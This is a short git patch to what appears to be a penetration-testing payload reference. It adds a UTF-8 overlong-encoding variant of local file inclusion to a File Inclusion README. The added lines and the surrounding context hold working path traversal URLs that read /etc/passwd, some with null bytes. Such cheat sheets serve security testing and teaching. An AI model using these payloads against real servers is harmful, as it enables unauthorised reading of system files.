From 3b85f1b6fceba63fbeae37d18f8a170f90b5bd97 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sat, 29 Jun 2019 11:20:17 +0200
Subject: [PATCH] UTF-8 encoding for File Inclusion

---
 File Inclusion/README.md | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index c9049a1..fe79d7e 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -10,6 +10,7 @@
 * [Basic LFI](#basic-lfi)
     * [Null byte](#null-byte)
     * [Double encoding](#double-encoding)
+    * [UTF-8 encoding](#utf-8-encoding)
     * [Path and dot truncation](#path-and-dot-truncation)
     * [Filter bypass tricks](#filter-bypass-tricks)
 * [Basic RFI](#basic-rfi)
@@ -58,6 +59,13 @@ http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
 
+### UTF-8 encoding
+
+```powershell
+http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
+http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
+```
+
 ### Path and dot truncation
 
 On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.